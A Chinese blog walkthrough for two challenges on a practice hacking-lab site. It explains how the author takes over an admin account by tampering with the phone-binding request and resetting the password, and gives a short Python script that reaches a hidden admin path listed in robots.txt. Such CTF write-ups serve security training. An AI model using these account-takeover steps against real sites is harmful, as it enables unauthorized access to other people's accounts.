之前的几天,我已经连载了基础关,脚本关,上传关,及注入关的过关攻略,今天开始连载综合关过关攻略,希望小伙伴伴继续支持小站。
综合关这一关之前是逆向关,本来是没有题目的,后来才加的,是渗透测试的第一期。
游戏地址:
http://hackinglab.sinaapp.com/index.php
综合关过关攻略
第1题:渗透测试第一期
注意:该题目模拟真实环境,故具有排他性,请选择合适的时间段完成该题。 你只有一部可用手机,手机号码会在需要手机号码的页面中给出。
本关给出的过关地址是一个用户登陆页面,我们可以进行注册进行登陆,登陆以后会提示“key在管理员那里~”,所以本关的核心应该是使用"admin"用户登陆,最终获取到通关的key....那么问题来了?该如何得到admin用户的密码呢? 我给大家说说我的过关步骤,其中包含了我的思考。
1、注册账号,登陆用户中心,提示“key在管理员那里~”,由此得到我们需要使用admin用户登陆。
2、尝试对当前用户进行密码找回,在找回密码的时候将username更改为admin,phone:13388241711提示手机不正确,说明admin用户绑定的手机号非13388241711,由此得到我们可能需要将admin用户的手机号绑定为13388241711
3、对注册用户的密码进行找回,发现注册用户密码的长度为40位,由此得到想暴力破解基本不可能。
4、继续注册新用户,对用户手机绑定的逻辑进行尝试,在点击注册的时候进行抓包,修改用户名为admin提交,提示绑定成功。
5、尝试对admin用户的密码进行找回,使用手机号13388241711获取手机验证码,成功得到管理员的重置密码。
6、使用admin及得到的密码进行登陆,成功得到key.....
本关写的有点啰嗦,精简一点就是“网站对用户手机绑定的验证逻辑验证有问题,没有验证绑定账号是否为之前注册的用户名,可以将任意用户绑定到你指定的手机号”
2015年/04/07日更新:
第2题:没有注入到底能不能绕过登录
通关提示,不是sql注入,也就是说这关不是通过注入来搞定。。通过一些简单的测试,发现robots.txt,里面有后台地址,直接访问,发现是需要登陆的,使用如下脚本可以搞定。。。。
#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
# Date: 2015/4/7
# Created by 独自等待
# 博客 http://www.waitalone.cn/
try:
import requests
except ImportError:
raise SystemExit('\n[!] requests模块导入错误,请执行pip install requests安装!')
session = requests.Session()
url = 'http://lab1.xseclab.com/pentest3_307c0281537de1615673af8c1d54885a/'
data = {'username': 'admin', 'password': 'waitalone.cn'}
reqpost = session.post(url, data=data)
url2 = 'http://lab1.xseclab.com/pentest3_307c0281537de1615673af8c1d54885a/myadminroot/'
reqget = session.get(url2)
print '综合关第2题过关脚本:'
print reqget.content
from www.waitalone.cn.thanks for it.
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论